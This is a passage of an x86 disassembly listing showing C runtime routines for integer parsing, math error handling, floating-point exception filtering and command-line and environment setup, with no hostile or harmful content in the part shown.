		mov	bl, [edi]
		inc	edi

loc_40AAA5:				; CODE XREF: sub_40A9EB+B5j
		mov	eax, [ebp+arg_C]
		test	eax, eax
		jl	loc_40ABF9
		cmp	eax, 1
		jz	loc_40ABF9
		cmp	eax, 24h
		jg	loc_40ABF9
		test	eax, eax
		jnz	short loc_40AAF0
		cmp	bl, 30h
		jz	short loc_40AAD4
		mov	[ebp+arg_C], 0Ah
		jmp	short loc_40AB08
; ---------------------------------------------------------------------------

loc_40AAD4:				; CODE XREF: sub_40A9EB+DEj
		mov	al, [edi]
		cmp	al, 78h
		jz	short loc_40AAE7
		cmp	al, 58h
		jz	short loc_40AAE7
		mov	[ebp+arg_C], 8
		jmp	short loc_40AB08
; ---------------------------------------------------------------------------

loc_40AAE7:				; CODE XREF: sub_40A9EB+EDj
					; sub_40A9EB+F1j
		mov	[ebp+arg_C], 10h
		jmp	short loc_40AAFA
; ---------------------------------------------------------------------------

loc_40AAF0:				; CODE XREF: sub_40A9EB+D9j
		cmp	eax, 10h
		jnz	short loc_40AB08
		cmp	bl, 30h
		jnz	short loc_40AB08

loc_40AAFA:				; CODE XREF: sub_40A9EB+103j
		mov	al, [edi]
		cmp	al, 78h
		jz	short loc_40AB04
		cmp	al, 58h
		jnz	short loc_40AB08

loc_40AB04:				; CODE XREF: sub_40A9EB+113j
		inc	edi
		mov	bl, [edi]
		inc	edi

loc_40AB08:				; CODE XREF: sub_40A9EB+E7j
					; sub_40A9EB+FAj ...
		mov	esi, [ecx+0C8h]
		or	eax, 0FFFFFFFFh
		xor	edx, edx
		div	[ebp+arg_C]

loc_40AB16:				; CODE XREF: sub_40A9EB+19Dj
		movzx	ecx, bl
		movzx	ecx, word ptr [esi+ecx*2]
		test	cl, 4
		jz	short loc_40AB2A
		movsx	ecx, bl
		sub	ecx, 30h
		jmp	short loc_40AB44
; ---------------------------------------------------------------------------

loc_40AB2A:				; CODE XREF: sub_40A9EB+135j
		test	cx, 103h
		jz	short loc_40AB62
		mov	cl, bl
		sub	cl, 61h
		cmp	cl, 19h
		movsx	ecx, bl
		ja	short loc_40AB41
		sub	ecx, 20h

loc_40AB41:				; CODE XREF: sub_40A9EB+151j
		add	ecx, 0FFFFFFC9h

loc_40AB44:				; CODE XREF: sub_40A9EB+13Dj
		cmp	ecx, [ebp+arg_C]
		jnb	short loc_40AB62
		or	[ebp+arg_10], 8
		cmp	[ebp+var_4], eax
		jb	short loc_40AB79
		jnz	short loc_40AB58
		cmp	ecx, edx
		jbe	short loc_40AB79

loc_40AB58:				; CODE XREF: sub_40A9EB+167j
		or	[ebp+arg_10], 4
		cmp	[ebp+arg_8], 0
		jnz	short loc_40AB85

loc_40AB62:				; CODE XREF: sub_40A9EB+144j
					; sub_40A9EB+15Cj
		mov	eax, [ebp+arg_10]
		dec	edi
		test	al, 8
		jnz	short loc_40AB8A
		cmp	[ebp+arg_8], 0
		jz	short loc_40AB73
		mov	edi, [ebp+arg_4]

loc_40AB73:				; CODE XREF: sub_40A9EB+183j
		and	[ebp+var_4], 0
		jmp	short loc_40ABD5
; ---------------------------------------------------------------------------

loc_40AB79:				; CODE XREF: sub_40A9EB+165j
					; sub_40A9EB+16Bj
		mov	ebx, [ebp+var_4]
		imul	ebx, [ebp+arg_C]
		add	ebx, ecx
		mov	[ebp+var_4], ebx

loc_40AB85:				; CODE XREF: sub_40A9EB+175j
		mov	bl, [edi]
		inc	edi
		jmp	short loc_40AB16
; ---------------------------------------------------------------------------

loc_40AB8A:				; CODE XREF: sub_40A9EB+17Dj
		test	al, 4
		mov	esi, 7FFFFFFFh
		jnz	short loc_40ABAE
		test	al, 1
		jnz	short loc_40ABD5
		and	eax, 2
		jz	short loc_40ABA5
		cmp	[ebp+var_4], 80000000h
		ja	short loc_40ABAE

loc_40ABA5:				; CODE XREF: sub_40A9EB+1AFj
		test	eax, eax
		jnz	short loc_40ABD5
		cmp	[ebp+var_4], esi
		jbe	short loc_40ABD5

loc_40ABAE:				; CODE XREF: sub_40A9EB+1A6j
					; sub_40A9EB+1B8j
		call	sub_405D93
		test	byte ptr [ebp+arg_10], 1
		mov	dword ptr [eax], 22h
		jz	short loc_40ABC5
		or	[ebp+var_4], 0FFFFFFFFh
		jmp	short loc_40ABD5
; ---------------------------------------------------------------------------

loc_40ABC5:				; CODE XREF: sub_40A9EB+1D2j
		mov	al, byte ptr [ebp+arg_10]
		and	al, 2
		neg	al
		sbb	eax, eax
		neg	eax
		add	eax, esi
		mov	[ebp+var_4], eax

loc_40ABD5:				; CODE XREF: sub_40A9EB+18Cj
					; sub_40A9EB+1AAj ...
		mov	eax, [ebp+arg_8]
		test	eax, eax
		jz	short loc_40ABDE
		mov	[eax], edi

loc_40ABDE:				; CODE XREF: sub_40A9EB+1EFj
		test	byte ptr [ebp+arg_10], 2
		jz	short loc_40ABE7
		neg	[ebp+var_4]

loc_40ABE7:				; CODE XREF: sub_40A9EB+1F7j
		cmp	[ebp+var_8], 0
		jz	short loc_40ABF4
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40ABF4:				; CODE XREF: sub_40A9EB+200j
		mov	eax, [ebp+var_4]
		jmp	short loc_40AC11
; ---------------------------------------------------------------------------

loc_40ABF9:				; CODE XREF: sub_40A9EB+BFj
					; sub_40A9EB+C8j ...
		mov	eax, [ebp+arg_8]
		test	eax, eax
		jz	short loc_40AC02
		mov	[eax], esi

loc_40AC02:				; CODE XREF: sub_40A9EB+213j
		cmp	[ebp+var_8], 0
		jz	short loc_40AC0F
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40AC0F:				; CODE XREF: sub_40A9EB+21Bj
		xor	eax, eax

loc_40AC11:				; CODE XREF: sub_40A9EB+20Cj
		pop	ebx

loc_40AC12:				; CODE XREF: sub_40A9EB+4Cj
		pop	edi
		pop	esi
		leave
		retn
sub_40A9EB	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40AC16	proc near		; CODE XREF: sub_404365+8p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		xor	eax, eax
		cmp	dword_428900, eax
		push	eax
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		jnz	short loc_40AC34
		push	offset off_424680
		jmp	short loc_40AC35
; ---------------------------------------------------------------------------

loc_40AC34:				; CODE XREF: sub_40AC16+15j
		push	eax

loc_40AC35:				; CODE XREF: sub_40AC16+1Cj
		call	sub_40A9EB
		add	esp, 14h
		pop	ebp
		retn
sub_40AC16	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40AC3F	proc near		; CODE XREF: sub_404380+B5p

var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= qword	ptr -20h
var_18		= qword	ptr -18h
var_10		= qword	ptr -10h
var_8		= qword	ptr -8
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		xor	eax, eax
		cmp	dword_428E10, eax
		push	ebx
		mov	ebx, [ebp+arg_4]
		push	esi
		mov	esi, [ebp+arg_8]
		push	edi
		mov	edi, [ebp+arg_0]
		mov	byte ptr [ebp+var_8], al
		mov	byte ptr [ebp+var_8+1],	al
		mov	byte ptr [ebp+var_8+2],	al
		mov	byte ptr [ebp+var_8+3],	al
		mov	byte ptr [ebp+var_8+4],	al
		mov	byte ptr [ebp+var_8+5],	al
		mov	byte ptr [ebp+var_8+6],	al
		mov	byte ptr [ebp+var_8+7],	al
		jz	short loc_40AC81
		push	dword_437EA0
		call	sub_405753
		pop	ecx
		jmp	short loc_40AC86
; ---------------------------------------------------------------------------

loc_40AC81:				; CODE XREF: sub_40AC3F+32j
		mov	eax, offset sub_40FCC8

loc_40AC86:				; CODE XREF: sub_40AC3F+40j
		mov	ecx, [ebp+arg_C]
		mov	edx, 0A6h
		cmp	ecx, edx
		jg	loc_40AE0A
		jz	loc_40ADF7
		cmp	ecx, 19h
		jg	loc_40AD9D
		jz	loc_40AD94
		mov	edx, ecx
		push	2
		pop	ecx
		sub	edx, ecx
		jz	loc_40AD85
		dec	edx
		jz	loc_40AD7C
		sub	edx, 5
		jz	loc_40AD6D
		dec	edx
		jz	loc_40AD55
		sub	edx, 5
		jz	short loc_40AD45
		dec	edx
		jz	short loc_40AD1C
		sub	edx, 9
		jnz	loc_40AEB4	; default
		mov	[ebp+var_28], 3

loc_40ACE7:				; CODE XREF: sub_40AC3F+1ACj
		mov	[ebp+var_24], offset aPow ; "pow"

loc_40ACEE:				; CODE XREF: sub_40AC3F+114j
					; sub_40AC3F+138j ...
		fld	qword ptr [edi]
		lea	ecx, [ebp+var_28]
		fstp	[ebp+var_20]
		push	ecx
		fld	qword ptr [ebx]
		fstp	[ebp+var_18]
		fld	qword ptr [esi]
		fstp	[ebp+var_10]
		call	eax
		test	eax, eax
		pop	ecx
		jnz	loc_40AEAF
		call	sub_405D93
		mov	dword ptr [eax], 22h
		jmp	loc_40AEAF
; ---------------------------------------------------------------------------

loc_40AD1C:				; CODE XREF: sub_40AC3F+96j
		mov	[ebp+var_24], offset aExp ; "exp"

loc_40AD23:				; CODE XREF: sub_40AC3F+15Cj
		fld	qword ptr [edi]
		lea	ecx, [ebp+var_28]
		fstp	[ebp+var_20]
		push	ecx
		fld	qword ptr [ebx]
		mov	[ebp+var_28], 4
		fstp	[ebp+var_18]
		fld	qword ptr [esi]
		fstp	[ebp+var_10]
		call	eax
		pop	ecx
		jmp	loc_40AEAF
; ---------------------------------------------------------------------------

loc_40AD45:				; CODE XREF: sub_40AC3F+93j
		mov	[ebp+var_28], 3
		mov	[ebp+var_24], offset aExp ; "exp"
		jmp	short loc_40ACEE
; ---------------------------------------------------------------------------

loc_40AD55:				; CODE XREF: sub_40AC3F+8Aj
		mov	[ebp+var_24], offset aLog10 ; "log10"

loc_40AD5C:				; CODE XREF: sub_40AC3F+144j
					; sub_40AC3F+181j ...
		fld	qword ptr [edi]
		fstp	[ebp+var_20]
		fld	qword ptr [ebx]
		fstp	[ebp+var_18]
		fld	qword ptr [esi]
		jmp	loc_40AE8F
; ---------------------------------------------------------------------------

loc_40AD6D:				; CODE XREF: sub_40AC3F+83j
		mov	[ebp+var_28], ecx
		mov	[ebp+var_24], offset aLog10 ; "log10"
		jmp	loc_40ACEE
; ---------------------------------------------------------------------------

loc_40AD7C:				; CODE XREF: sub_40AC3F+7Aj
		mov	[ebp+var_24], offset aLog ; "log"
		jmp	short loc_40AD5C
; ---------------------------------------------------------------------------

loc_40AD85:				; CODE XREF: sub_40AC3F+73j
		mov	[ebp+var_28], ecx
		mov	[ebp+var_24], offset aLog ; "log"
		jmp	loc_40ACEE
; ---------------------------------------------------------------------------

loc_40AD94:				; CODE XREF: sub_40AC3F+66j
		mov	[ebp+var_24], offset aPow ; "pow"
		jmp	short loc_40AD23
; ---------------------------------------------------------------------------

loc_40AD9D:				; CODE XREF: sub_40AC3F+60j
		sub	ecx, 1Ah
		jz	short loc_40ADF0
		dec	ecx
		jz	short loc_40ADE4
		dec	ecx
		jz	short loc_40ADD8 ; jumptable 0040AE19 case 1006
		dec	ecx
		jz	short loc_40ADCB
		sub	ecx, 1Dh
		jz	short loc_40ADC2 ; jumptable 0040AE19 case 1008
		sub	ecx, 3
		jnz	loc_40AEB4	; default

loc_40ADB9:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset aAsin ; jumptable 0040AE19	case 1009
		jmp	short loc_40AD5C
; ---------------------------------------------------------------------------

loc_40ADC2:				; CODE XREF: sub_40AC3F+16Fj
					; sub_40AC3F+1DAj
					; DATA XREF: ...
		mov	[ebp+var_24], offset aAcos ; jumptable 0040AE19	case 1008
		jmp	short loc_40AD5C
; ---------------------------------------------------------------------------

loc_40ADCB:				; CODE XREF: sub_40AC3F+16Aj
		mov	[ebp+var_24], offset aPow ; "pow"

loc_40ADD2:				; CODE XREF: sub_40AC3F+1E8j
					; sub_40AC3F+1F1j ...
		fld	qword ptr [edi]
		fstp	qword ptr [esi]
		jmp	short loc_40AD5C
; ---------------------------------------------------------------------------

loc_40ADD8:				; CODE XREF: sub_40AC3F+167j
					; sub_40AC3F+1DAj
					; DATA XREF: ...
		mov	[ebp+var_24], offset aPow ; jumptable 0040AE19 case 1006
		jmp	loc_40AD5C
; ---------------------------------------------------------------------------

loc_40ADE4:				; CODE XREF: sub_40AC3F+164j
		mov	[ebp+var_28], 2
		jmp	loc_40ACE7
; ---------------------------------------------------------------------------

loc_40ADF0:				; CODE XREF: sub_40AC3F+161j
		fld1
		jmp	loc_40AEB2
; ---------------------------------------------------------------------------

loc_40ADF7:				; CODE XREF: sub_40AC3F+57j
		mov	[ebp+var_28], 3
		mov	[ebp+var_24], offset aExp10 ; "exp10"
		jmp	loc_40ACEE
; ---------------------------------------------------------------------------

loc_40AE0A:				; CODE XREF: sub_40AC3F+51j
		add	ecx, 0FFFFFC18h	; switch 13 cases
		cmp	ecx, 0Ch
		ja	loc_40AEB4	; default
		jmp	ds:off_40AEBB[ecx*4] ; switch jump

loc_40AE20:				; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset aLog ; jumptable 0040AE19 case 1000
		jmp	short loc_40ADD2
; ---------------------------------------------------------------------------

loc_40AE29:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset aLog10 ; jumptable	0040AE19 case 1001
		jmp	short loc_40ADD2
; ---------------------------------------------------------------------------

loc_40AE32:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset aExp ; jumptable 0040AE19 case 1002
		jmp	short loc_40ADD2
; ---------------------------------------------------------------------------

loc_40AE3B:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset aAtan ; jumptable 0040AE19	case 1003
		jmp	short loc_40ADD2
; ---------------------------------------------------------------------------

loc_40AE44:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset aCeil ; jumptable 0040AE19	case 1004
		jmp	short loc_40ADD2
; ---------------------------------------------------------------------------

loc_40AE4D:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset aFloor ; jumptable	0040AE19 case 1005
		jmp	loc_40ADD2
; ---------------------------------------------------------------------------

loc_40AE59:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset aModf ; jumptable 0040AE19	case 1007
		jmp	loc_40ADD2
; ---------------------------------------------------------------------------

loc_40AE65:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset dword_41EBE0 ; jumptable 0040AE19 case 1010
		jmp	short loc_40AE7E
; ---------------------------------------------------------------------------

loc_40AE6E:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset dword_41EBDC ; jumptable 0040AE19 case 1011
		jmp	short loc_40AE7E
; ---------------------------------------------------------------------------

loc_40AE77:				; CODE XREF: sub_40AC3F+1DAj
					; DATA XREF: .text:off_40AEBBo
		mov	[ebp+var_24], offset dword_41EBD8 ; jumptable 0040AE19 case 1012

loc_40AE7E:				; CODE XREF: sub_40AC3F+22Dj
					; sub_40AC3F+236j
		fld	qword ptr [edi]
		fmul	[ebp+var_8]
		fst	qword ptr [esi]
		fld	qword ptr [edi]
		fstp	[ebp+var_20]
		fld	qword ptr [ebx]
		fstp	[ebp+var_18]

loc_40AE8F:				; CODE XREF: sub_40AC3F+129j
		lea	ecx, [ebp+var_28]
		fstp	[ebp+var_10]
		push	ecx
		mov	[ebp+var_28], 1
		call	eax
		test	eax, eax
		pop	ecx
		jnz	short loc_40AEAF
		call	sub_405D93
		mov	dword ptr [eax], 21h

loc_40AEAF:				; CODE XREF: sub_40AC3F+C7j
					; sub_40AC3F+D8j ...
		fld	[ebp+var_10]

loc_40AEB2:				; CODE XREF: sub_40AC3F+1B3j
		fstp	qword ptr [esi]

loc_40AEB4:				; CODE XREF: sub_40AC3F+9Bj
					; sub_40AC3F+174j ...
		pop	edi		; default
		pop	esi
		pop	ebx
		leave
		retn
sub_40AC3F	endp

; ---------------------------------------------------------------------------
		db 8Bh,	0FFh
off_40AEBB	dd offset loc_40AE20	; DATA XREF: sub_40AC3F+1DAr
		dd offset loc_40AE29	; jump table for switch	statement
		dd offset loc_40AE32
		dd offset loc_40AE3B
		dd offset loc_40AE44
		dd offset loc_40AE4D
		dd offset loc_40ADD8
		dd offset loc_40AE59
		dd offset loc_40ADC2
		dd offset loc_40ADB9
		dd offset loc_40AE65
		dd offset loc_40AE6E
		dd offset loc_40AE77

; =============== S U B	R O U T	I N E =======================================



sub_40AEEF	proc near		; DATA XREF: zcrshv4o:0041E2ECo
		and	dword_437E98, 0
		call	sub_40FD99
		mov	dword_437E98, eax
		xor	eax, eax
		retn
sub_40AEEF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_40AF03(double)

sub_40AF03	proc near		; CODE XREF: sub_404380+7j
					; sub_404380+38j

var_24		= qword	ptr -24h
var_18		= qword	ptr -18h
var_8		= qword	ptr -8
arg_0		= qword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	ebx
		push	esi
		mov	esi, 0FFFFh
		push	esi
		push	dword_424DB8
		call	sub_41061D
		fld	[ebp+arg_0]
		pop	ecx
		pop	ecx
		mov	ebx, eax
		mov	eax, dword ptr [ebp+arg_0+6]
		push	ecx
		and	ax, 7FF0h
		cmp	ax, 7FF0h
		push	ecx
		fstp	[esp+18h+var_18]
		jnz	short loc_40AF89
		call	sub_4104FC
		test	eax, eax
		pop	ecx
		pop	ecx
		jle	short loc_40AF6C
		cmp	eax, 2
		jle	short loc_40AF5E
		cmp	eax, 3
		jnz	short loc_40AF6C
		fld	[ebp+arg_0]
		push	ebx		; int
		push	ecx
		push	ecx		; double
		fstp	qword ptr [esp]
		push	0Ch		; int
		call	sub_4103B4
		add	esp, 10h
		jmp	short loc_40AFD0
; ---------------------------------------------------------------------------

loc_40AF5E:				; CODE XREF: sub_40AF03+3Fj
		push	esi
		push	ebx
		call	sub_41061D
		fld	[ebp+arg_0]
		pop	ecx
		pop	ecx
		jmp	short loc_40AFD0
; ---------------------------------------------------------------------------

loc_40AF6C:				; CODE XREF: sub_40AF03+3Aj
					; sub_40AF03+44j
		fld	[ebp+arg_0]
		push	ebx
		fadd	ds:dbl_41EC10
		sub	esp, 10h
		fstp	qword ptr [esp+8]
		fld	[ebp+arg_0]
		fstp	[esp+24h+var_24]
		push	0Ch
		push	8
		jmp	short loc_40AFC8
; ---------------------------------------------------------------------------

loc_40AF89:				; CODE XREF: sub_40AF03+2Fj
		call	sub_4104C1
		fstp	[ebp+var_8]
		fld	[ebp+arg_0]
		pop	ecx
		fcomp	[ebp+var_8]
		pop	ecx
		fnstsw	ax
		test	ah, 44h
		jp	short loc_40AFAE

loc_40AFA0:				; CODE XREF: sub_40AF03+AEj
		push	esi
		push	ebx
		call	sub_41061D
		fld	[ebp+var_8]
		pop	ecx
		pop	ecx
		jmp	short loc_40AFD0
; ---------------------------------------------------------------------------

loc_40AFAE:				; CODE XREF: sub_40AF03+9Bj
		test	bl, 20h
		jnz	short loc_40AFA0
		fld	[ebp+var_8]
		push	ebx		; int
		sub	esp, 10h
		fstp	qword ptr [esp+8]
		fld	[ebp+arg_0]
		fstp	[esp+24h+var_24]
		push	0Ch		; int
		push	10h		; int

loc_40AFC8:				; CODE XREF: sub_40AF03+84j
		call	sub_410407
		add	esp, 1Ch

loc_40AFD0:				; CODE XREF: sub_40AF03+59j
					; sub_40AF03+67j ...
		pop	esi
		pop	ebx
		leave
		retn
sub_40AF03	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_464. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40AFD5	proc near		; CODE XREF: .text:0040469Bp

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	esi
		call	sub_4058DA
		mov	esi, eax
		test	esi, esi
		jnz	short loc_40AFF4
		push	[ebp+arg_4]
		call	ds:off_41E198
		jmp	loc_40B141
; ---------------------------------------------------------------------------

loc_40AFF4:				; CODE XREF: sub_40AFD5+Fj
		mov	edx, [esi+5Ch]
		mov	eax, dword_424E44
		push	edi
		mov	edi, [ebp+arg_0]
		mov	ecx, edx
		push	ebx

loc_40B003:				; CODE XREF: sub_40AFD5+3Ej
		cmp	[ecx], edi
		jz	short loc_40B015
		mov	ebx, eax
		imul	ebx, 0Ch
		add	ecx, 0Ch
		add	ebx, edx
		cmp	ecx, ebx
		jb	short loc_40B003

loc_40B015:				; CODE XREF: sub_40AFD5+30j
		imul	eax, 0Ch
		add	eax, edx
		cmp	ecx, eax
		jnb	short loc_40B026
		cmp	[ecx], edi
		jnz	short loc_40B026
		mov	eax, ecx
		jmp	short loc_40B028
; ---------------------------------------------------------------------------

loc_40B026:				; CODE XREF: sub_40AFD5+47j
					; sub_40AFD5+4Bj
		xor	eax, eax

loc_40B028:				; CODE XREF: sub_40AFD5+4Fj
		test	eax, eax
		jz	short loc_40B036
		mov	ebx, [eax+8]
		test	ebx, ebx
		mov	[ebp+var_4], ebx
		jnz	short loc_40B044

loc_40B036:				; CODE XREF: sub_40AFD5+55j
		push	[ebp+arg_4]
		call	ds:off_41E198
		jmp	loc_40B13F
; ---------------------------------------------------------------------------

loc_40B044:				; CODE XREF: sub_40AFD5+5Fj
		cmp	ebx, 5
		jnz	short loc_40B055
		and	dword ptr [eax+8], 0
		xor	eax, eax
		inc	eax
		jmp	loc_40B13F
; ---------------------------------------------------------------------------

loc_40B055:				; CODE XREF: sub_40AFD5+72j
		cmp	ebx, 1
		jz	loc_40B13C
		mov	ecx, [esi+60h]
		mov	[ebp+var_8], ecx
		mov	ecx, [ebp+arg_4]
		mov	[esi+60h], ecx
		mov	ecx, [eax+4]
		cmp	ecx, 8
		jnz	loc_40B12E
		mov	ecx, dword_424E38
		mov	edi, dword_424E3C
		mov	edx, ecx
		add	edi, ecx
		cmp	edx, edi
		jge	short loc_40B0AE
		imul	ecx, 0Ch

loc_40B08D:				; CODE XREF: sub_40AFD5+D4j
		mov	edi, [esi+5Ch]
		and	dword ptr [ecx+edi+8], 0
		mov	edi, dword_424E38
		mov	ebx, dword_424E3C
		inc	edx
		add	ebx, edi
		add	ecx, 0Ch
		cmp	edx, ebx
		jl	short loc_40B08D
		mov	ebx, [ebp+var_4]

loc_40B0AE:				; CODE XREF: sub_40AFD5+B3j
		mov	eax, [eax]
		cmp	eax, 0C000008Eh
		mov	edi, [esi+64h]
		jnz	short loc_40B0C3
		mov	dword ptr [esi+64h], 83h
		jmp	short loc_40B121
; ---------------------------------------------------------------------------

loc_40B0C3:				; CODE XREF: sub_40AFD5+E3j
		cmp	eax, 0C0000090h
		jnz	short loc_40B0D3
		mov	dword ptr [esi+64h], 81h
		jmp	short loc_40B121
; ---------------------------------------------------------------------------

loc_40B0D3:				; CODE XREF: sub_40AFD5+F3j
		cmp	eax, 0C0000091h
		jnz	short loc_40B0E3
		mov	dword ptr [esi+64h], 84h
		jmp	short loc_40B121
; ---------------------------------------------------------------------------

loc_40B0E3:				; CODE XREF: sub_40AFD5+103j
		cmp	eax, 0C0000093h
		jnz	short loc_40B0F3
		mov	dword ptr [esi+64h], 85h
		jmp	short loc_40B121
; ---------------------------------------------------------------------------

loc_40B0F3:				; CODE XREF: sub_40AFD5+113j
		cmp	eax, 0C000008Dh
		jnz	short loc_40B103
		mov	dword ptr [esi+64h], 82h
		jmp	short loc_40B121
; ---------------------------------------------------------------------------

loc_40B103:				; CODE XREF: sub_40AFD5+123j
		cmp	eax, 0C000008Fh
		jnz	short loc_40B113
		mov	dword ptr [esi+64h], 86h
		jmp	short loc_40B121
; ---------------------------------------------------------------------------

loc_40B113:				; CODE XREF: sub_40AFD5+133j
		cmp	eax, 0C0000092h
		jnz	short loc_40B121
		mov	dword ptr [esi+64h], 8Ah

loc_40B121:				; CODE XREF: sub_40AFD5+ECj
					; sub_40AFD5+FCj ...
		push	dword ptr [esi+64h]
		push	8
		call	ebx
		pop	ecx
		mov	[esi+64h], edi
		jmp	short loc_40B135
; ---------------------------------------------------------------------------

loc_40B12E:				; CODE XREF: sub_40AFD5+9Bj
		and	dword ptr [eax+8], 0
		push	ecx
		call	ebx

loc_40B135:				; CODE XREF: sub_40AFD5+157j
		mov	eax, [ebp+var_8]
		pop	ecx
		mov	[esi+60h], eax

loc_40B13C:				; CODE XREF: sub_40AFD5+83j
		or	eax, 0FFFFFFFFh

loc_40B13F:				; CODE XREF: sub_40AFD5+6Aj
					; sub_40AFD5+7Bj
		pop	ebx
		pop	edi

loc_40B141:				; CODE XREF: sub_40AFD5+1Aj
		pop	esi
		leave
		retn
sub_40AFD5	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B144	proc near		; CODE XREF: .text:loc_404658p
		push	esi
		push	edi
		xor	edi, edi
		cmp	dword_438FF4, edi
		jnz	short loc_40B155
		call	sub_4053C3

loc_40B155:				; CODE XREF: sub_40B144+Aj
		mov	esi, dword_439018
		test	esi, esi
		jnz	short loc_40B164
		mov	esi, offset word_41E4A2

loc_40B164:				; CODE XREF: sub_40B144+19j
					; sub_40B144+4Bj
		mov	al, [esi]
		cmp	al, 20h
		ja	short loc_40B172
		test	al, al
		jz	short loc_40B19C
		test	edi, edi
		jz	short loc_40B196

loc_40B172:				; CODE XREF: sub_40B144+24j
		cmp	al, 22h
		jnz	short loc_40B17F
		xor	ecx, ecx
		test	edi, edi
		setz	cl
		mov	edi, ecx

loc_40B17F:				; CODE XREF: sub_40B144+30j
		movzx	eax, al
		push	eax
		call	sub_41075D
		test	eax, eax
		pop	ecx
		jz	short loc_40B18E
		inc	esi

loc_40B18E:				; CODE XREF: sub_40B144+47j
		inc	esi
		jmp	short loc_40B164
; ---------------------------------------------------------------------------

loc_40B191:				; CODE XREF: sub_40B144+56j
		cmp	al, 20h
		ja	short loc_40B19C
		inc	esi

loc_40B196:				; CODE XREF: sub_40B144+2Cj
		mov	al, [esi]
		test	al, al
		jnz	short loc_40B191

loc_40B19C:				; CODE XREF: sub_40B144+28j
					; sub_40B144+4Fj
		pop	edi
		mov	eax, esi
		pop	esi
		retn
sub_40B144	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B1A1	proc near		; CODE XREF: .text:loc_404635p
		push	ebx
		xor	ebx, ebx
		cmp	dword_438FF4, ebx
		push	esi
		push	edi
		jnz	short loc_40B1B3
		call	sub_4053C3

loc_40B1B3:				; CODE XREF: sub_40B1A1+Bj
		mov	esi, dword_4285B4
		xor	edi, edi
		cmp	esi, ebx
		jnz	short loc_40B1D7

loc_40B1BF:				; CODE XREF: sub_40B1A1+51j
		or	eax, 0FFFFFFFFh
		jmp	loc_40B262
; ---------------------------------------------------------------------------

loc_40B1C7:				; CODE XREF: sub_40B1A1+3Aj
		cmp	al, 3Dh
		jz	short loc_40B1CC
		inc	edi

loc_40B1CC:				; CODE XREF: sub_40B1A1+28j
		push	esi
		call	sub_4046F0
		pop	ecx
		lea	esi, [esi+eax+1]

loc_40B1D7:				; CODE XREF: sub_40B1A1+1Cj
		mov	al, [esi]
		cmp	al, bl
		jnz	short loc_40B1C7
		push	4
		inc	edi
		push	edi
		call	sub_407D3A
		mov	edi, eax
		cmp	edi, ebx
		pop	ecx
		pop	ecx
		mov	dword_428AB8, edi
		jz	short loc_40B1BF
		mov	esi, dword_4285B4
		push	ebp
		jmp	short loc_40B23D
; ---------------------------------------------------------------------------

loc_40B1FD:				; CODE XREF: sub_40B1A1+9Ej
		push	esi
		call	sub_4046F0
		mov	ebp, eax
		inc	ebp
		cmp	byte ptr [esi],	3Dh
		pop	ecx
		jz	short loc_40B23B
		push	1
		push	ebp
		call	sub_407D3A
		cmp	eax, ebx
		pop	ecx
		pop	ecx
		mov	[edi], eax
		jz	short loc_40B266
		push	esi
		push	ebp
		push	eax
		call	sub_407C95
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_40B238
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4033CB
		add	esp, 14h

loc_40B238:				; CODE XREF: sub_40B1A1+88j
		add	edi, 4

loc_40B23B:				; CODE XREF: sub_40B1A1+69j
		add	esi, ebp

loc_40B23D:				; CODE XREF: sub_40B1A1+5Aj
		cmp	[esi], bl
		jnz	short loc_40B1FD
		push	dword_4285B4
		call	sub_403B91
		mov	dword_4285B4, ebx
		mov	[edi], ebx
		mov	dword_438FE8, 1
		xor	eax, eax

loc_40B260:				; CODE XREF: sub_40B1A1+D9j
		pop	ecx
		pop	ebp

loc_40B262:				; CODE XREF: sub_40B1A1+21j
		pop	edi
		pop	esi
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_40B266:				; CODE XREF: sub_40B1A1+79j
		push	dword_428AB8
		call	sub_403B91
		mov	dword_428AB8, ebx
		or	eax, 0FFFFFFFFh
		jmp	short loc_40B260
sub_40B1A1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


